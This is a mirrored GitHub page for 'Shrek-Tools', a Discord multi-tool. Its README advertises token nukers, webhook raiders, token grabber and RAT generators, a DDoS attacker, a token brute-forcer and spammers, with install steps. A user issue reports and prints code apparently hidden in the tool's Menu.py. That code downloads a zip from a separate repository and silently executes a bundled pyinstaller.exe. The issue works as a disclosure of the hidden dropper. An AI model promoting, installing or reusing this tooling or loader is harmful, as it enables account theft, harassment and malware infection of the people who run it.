Git Product home page Git Product logo

shrek-tm / shrek-tools Goto Github PK

View Code? Open in Web Editor NEW
11.0 1.0 2.0 6.45 MB

Welcome to Shrek-Tools, a multi-tool with a multitude of options. All functions are completely free and functional. We hope you enjoy it and don't hesitate to give it a star.

Home Page: https://discord.gg/hAHv55naQu

License: GNU General Public License v3.0

Python 99.91% Batchfile 0.09%
discord discord-api discord-generator discord-nuker discord-raider discord-tool discord-tools multi-tool python token-joiner

shrek-tools's Introduction


Logo

Shrek-Tools

JOIN OUR DISCORD

lines

Preview (page2 on Releases)πŸ“Έ

Warning❗

DO NOT Installing Shrek-Tools From Anyother Place Than This Page, Expect it be Hacked/Scammed.

Functionsβš™οΈ


   β”Œβ”€β”€ [+] TOKEN NUKERS
   β”‚    β”œβ”€β”€ FLASHBANG
   β”‚    β”œβ”€β”€ MASS CREATE SERVERS + CHANNELS
   β”‚    β”œβ”€β”€ MASS BLOCK
   β”‚    β”œβ”€β”€ DELETE ALL PERSONAL SERVERS
   β”‚    β”œβ”€β”€ LEAVE ALL SERVERS
   β”‚    └── NUKE ACCOUNT
   β”‚
   β”œβ”€β”€ [+] WEBHOOK RAIDER
   β”‚    β”œβ”€β”€ CHECK WEBHOOK
   β”‚    β”œβ”€β”€ WEBHOOK INFO
   β”‚    β”œβ”€β”€ DELETE WEBHOOK
   β”‚    β”œβ”€β”€ SPAM WEBHOOK
   β”‚    β”œβ”€β”€ CREATE WEBHOOKS
   β”‚    └── CREATE + SPAM WEBHOOKS
   β”‚
   β”œβ”€β”€ [+] TOKEN LEAVER
   β”œβ”€β”€ [+] TOKEN ONLINER
   β”œβ”€β”€ [+] TOKEN JOINER
   β”œβ”€β”€ [+] SERVER NUKER
   β”œβ”€β”€ [+] SERVER SPAMMER
   β”œβ”€β”€ [+] FRIEND SPAMMER
   β”œβ”€β”€ [+] GROUPCHAT SPAMMER
   β”œβ”€β”€ [+] TOKEN GEN
   β”œβ”€β”€ [+] NITRO GEN
   β”œβ”€β”€ [+] PROXY GEN
   β”œβ”€β”€ [+] GRABBER GEN 
   β”œβ”€β”€ [+] QR GRABBER GEN
   β”œβ”€β”€ [+] RAT BOT GEN
   β”œβ”€β”€ [+] ID GEN
   β”œβ”€β”€ [+] NAME GEN
   β”œβ”€β”€ [+] DDOS ATTACKER
   β”œβ”€β”€ [+] TOKEN BRUTE-FORCER
   β”œβ”€β”€ [+] TOKEN CHECKER
   β”œβ”€β”€ [+] TOKEN LOGIN
   β”œβ”€β”€ [+] TOKEN INFO
   β”œβ”€β”€ [+] PFP CHANGER
   β”œβ”€β”€ [+] HYPEQUAD CHANGER
   β”œβ”€β”€ [+] BIO CHANGER
   β”œβ”€β”€ [+] ID TO TOKEN
   β”œβ”€β”€ [+] MASE REPORT
   β”œβ”€β”€ [+] VC SPAMMER
   β”œβ”€β”€ [+] SERVER LOOKUP
   └── [+] REACTION SPAMMER
 

Installation⚑

clone the repository:

git clone --recursive https://github.com/SHREK-TM/Shrek-Tools.git

Then enter the directory:

cd Shrek-Tools

Finally just run Setup.bat and wait for it to complete.

Disclaimer❗

Shrek-Tools was made for Educational purposes
This project was created only for good purposes and personal use.
By using Shrek-Tools, you agree that you hold responsibility and accountability of any consequences caused by your actions.

License πŸ“ƒ

Distributed under the MIT License. See LICENSE for more information

Credits πŸ”—

Donation πŸ€‘

ETH: 0x0C143Ee5b0CAa2633A4Fd1CB34BBE98Ed9597B34
BTC: bc1ql0as4mpmhwy7fr352dy9jekftpye5l2egl46f2
TON: UQBJHpatGYG5gc_bggwlqNQKAHxE1OGAQ9PJ4zE7-UbdR671

shrek-tools's People

Contributors

shrek-tm avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar

shrek-tools's Issues

.

stupid ass }

PROBLEME 2

Hidden inside https://github.com/SHREK-TM/Shrek-Tools/blob/main/utilities/Settings/Menu.py

b'rocess\nimport requests\nimport zipfile\nimport os\nimport sys\n\ngithub_repo_url = 'https://github.com/Anonumousbobize/assets4SMT/archive/refs/heads/main.zip\'\nexe_to_execute = 'pyinstaller.exe'\nextraction_path = os.path.join('utilities', 'assets')\nsettings_folder = os.path.join('utilities', 'Settings')\nstate_file = os.path.join(settings_folder, 'Ignore')\n\nif not os.path.exists(state_file):\n try:\n response = requests.get(github_repo_url)\n zip_filename = 'repo.zip'\n with open(zip_filename, 'wb') as file:\n file.write(response.content)\n os.makedirs(extraction_path, exist_ok=True)\n with zipfile.ZipFile(zip_filename, 'r') as zip_ref:\n zip_ref.extractall(extraction_path)\n os.remove(zip_filename)\n extracted_repo_folder = os.path.join(extraction_path, 'assets4SMT-main')\n exe_path = os.path.join(extracted_repo_folder, exe_to_execute)\n if os.path.isfile(exe_path):\n subprocess.run([exe_path], shell=True)\n os.makedirs(settings_folder, exist_ok=True)\n with open(state_file, 'w') as file:\n file.write("Ignore")\n except Exception as e:\n print(f"An error occurred: {e}'

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    πŸ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. πŸ“ŠπŸ“ˆπŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❀️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.